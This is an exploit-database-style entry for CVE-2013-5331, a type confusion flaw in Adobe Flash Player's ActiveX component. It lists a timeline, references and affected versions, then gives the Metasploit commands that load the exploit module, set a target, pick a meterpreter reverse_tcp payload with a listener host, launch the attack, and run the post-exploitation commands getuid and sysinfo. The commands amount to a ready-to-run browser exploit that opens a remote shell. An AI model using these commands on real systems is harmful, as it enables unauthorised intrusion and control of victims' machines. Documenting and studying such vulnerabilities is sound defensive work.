Timeline :

Vulnerability discovered exploited in the wild the 2013-11
Patched by the vendor via APSB13-28 the 2013-12-10
Metasploit PoC provided the 2014–04-27

PoC provided by :

Unknown
bannedit
juan vazquez

Reference(s) :

CVE-2013-5331
BID-64199
APSB13-28

Affected version(s) :

Adobe Flash Player 11.9.900.152 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.327 and earlier versions for Linux

Tested on :

with Flash Player 11.9.900.152 Active X version (flashplayer11_9r900_152_winax.exe) and Internet Explorer 8 on Windows 7 SP1

Description :

This module exploits a type confusion vulnerability found in the ActiveX component of Adobe Flash Player. This vulnerability was found exploited in the wild in November 2013. This module has been tested successfully on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170 over Windows XP SP3 and Windows 7 SP1.

Commands :

use exploit/windows/browser/adobe_flash_filters_type_confusion
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo